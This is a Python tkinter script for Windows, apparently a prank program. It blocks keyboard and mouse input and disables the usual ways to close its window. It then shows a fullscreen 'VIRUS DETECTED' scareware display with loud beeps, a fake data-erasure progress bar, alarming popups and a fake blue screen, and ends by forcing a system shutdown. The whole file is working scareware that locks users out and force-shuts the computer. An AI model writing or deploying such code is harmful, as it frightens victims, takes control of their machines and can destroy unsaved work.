import tkinter as tk
from tkinter import ttk, messagebox
import time
import random
import os
import threading
import winsound
import ctypes

# --- Input Locking (Windows) ---

def lock_input():
    ctypes.windll.user32.BlockInput(True)

def unlock_input():
    ctypes.windll.user32.BlockInput(False)

# --- GUI Madness ---

root = tk.Tk()
root.title("SYSTEM ANNIHILATION")
root.attributes("-fullscreen", True)
root.configure(bg="#300000")
root.overrideredirect(True)

root.protocol("WM_DELETE_WINDOW", lambda: None)
root.bind("<Control-c>", lambda e: None)
root.bind("<Alt-F4>", lambda e: None)
root.bind("<Escape>", lambda e: None)

flash_ids = []
shake_id = None

def flash_text(label, text_list, index=0):
    global flash_ids
    if label.winfo_exists():
        label.config(
            text=text_list[index % len(text_list)],
            fg=random.choice(["red", "white", "#FF5555", "#FF0000", "#FF3300", "#880000"]),
            font=("Courier", random.randint(50, 120), "bold")
        )
        flash_id = root.after(random.randint(50, 200), flash_text, label, text_list, index + 1)
        flash_ids.append(flash_id)

def shake_window():
    global shake_id
    if root.winfo_exists():
        x, y = root.winfo_x(), root.winfo_y()
        root.geometry(f"+{x + random.randint(-50, 50)}+{y + random.randint(-50, 50)}")
        shake_id = root.after(15, shake_window)

def play_terrifying_sound():
    if os.name == "nt":
        def sound_horror():
            for _ in range(90):
                winsound.Beep(random.randint(600, 3000), random.randint(100, 400))
                time.sleep(random.uniform(0.01, 0.1))
            for _ in range(50):
                winsound.Beep(random.randint(50, 400), 700)
                winsound.Beep(random.randint(1200, 3000), 150)
                time.sleep(random.uniform(0.05, 0.2))
            for _ in range(60):
                winsound.Beep(random.randint(30, 2000), random.randint(300, 700))
                time.sleep(random.uniform(0.02, 0.1))
            winsound.Beep(50, 7000)
        threading.Thread(target=sound_horror, daemon=True).start()

def fake_progress(progress, value=0):
    if value <= 100 and progress.winfo_exists():
        progress["value"] = value + random.randint(0, 10)
        progress["style"] = random.choice(["red.Horizontal.TProgressbar", "default.Horizontal.TProgressbar"])
        root.update()
        root.after(25, fake_progress, progress, value + 1)

def dramatic_popup(message, delay):
    popup = tk.Toplevel(bg="#300000")
    x, y = random.randint(0, root.winfo_screenwidth() - 600), random.randint(0, root.winfo_screenheight() - 400)
    popup.geometry(f"600x400+{x}+{y}")
    popup.overrideredirect(True)
    tk.Label(
        popup,
        text=message,
        font=("Courier", random.randint(28, 60), "bold"),
        fg=random.choice(["red", "white", "#FF0000", "#FF6600", "#880000"]),
        bg="#300000"
    ).pack(pady=100)
    popup.after(delay, popup.destroy)

# --- FAKE BSOD ---

def show_bsod():
    bsod = tk.Toplevel()
    bsod.attributes("-fullscreen", True)
    bsod.configure(bg="#0000AA")
    bsod.overrideredirect(True)
    message = (
        " :(\n\n"
        "Your PC ran into a problem and needs to restart.\n"
        "We're just collecting some error info, and then we'll restart for you.\n\n"
        "STOP CODE: SYSTEM_CRASH_SIMULATION\n\n"
        "If you call a support person, give them this info:\n"
        "KERNEL PANIC - SYSTEM TERMINATION\n"
    )
    tk.Label(bsod, text=message, fg="white", bg="#0000AA", font=("Consolas", 28), justify="left").pack(padx=100, pady=100)

# --- SEQUENCE ---

def troll_sequence():
    style = ttk.Style()
    style.configure("red.Horizontal.TProgressbar", troughcolor="#300000", background="red")

    shake_window()
    play_terrifying_sound()

    title = tk.Label(root, text="VIRUS DETECTED", font=("Courier", 80, "bold"), fg="red", bg="#300000")
    title.pack(pady=60)
    flash_text(title, ["VIRUS DETECTED", "SYSTEM ANNIHILATED", "DATA OBLITERATED", "FINAL DOOM", "NO ESCAPE"])

    progress_label = tk.Label(root, text="ERASING EVERYTHING...", font=("Courier", 32), fg="red", bg="#300000")
    progress_label.pack(pady=25)
    progress = ttk.Progressbar(root, length=800, mode="determinate", maximum=100, style="red.Horizontal.TProgressbar")
    progress.pack(pady=25)

    root.after(500, fake_progress, progress)
    messages = [
        "CONTAINMENT BREACHED!", "DRIVES DISINTEGRATING...", "MEMORY MELTING!", "NETWORK SHATTERED!", 
        "CORE FAILURE IMMINENT!", "SHUTDOWN OVERRIDDEN!", "DATA INFINITE SCREAMING!", "HARDWARE BURNOUT!", 
        "SYSTEM SELF-DESTRUCT ACTIVATED!", "NO ESCAPE!", "COUNTDOWN TO OBLIVION: 10... 9... 8...", 
        "TERROR ABSOLUTE!", "TOTAL ERADICATION!", "INSANITY OVERLOAD!", "ALL HOPE LOST!", "GAME OVER." 
    ]
    delay = 1500
    for msg in messages:
        root.after(delay, dramatic_popup, msg, 2000)
        delay += random.randint(1500, 2500)
    
    root.after(delay + 2000, show_bsod)
    root.after(delay + 5000, shutdown_system)

def shutdown_system():
    unlock_input()
    if os.name == "nt":
        os.system("shutdown /s /t 10 /f")

# --- START ---

def start():
    lock_input()
    troll_sequence()

start()
root.mainloop()
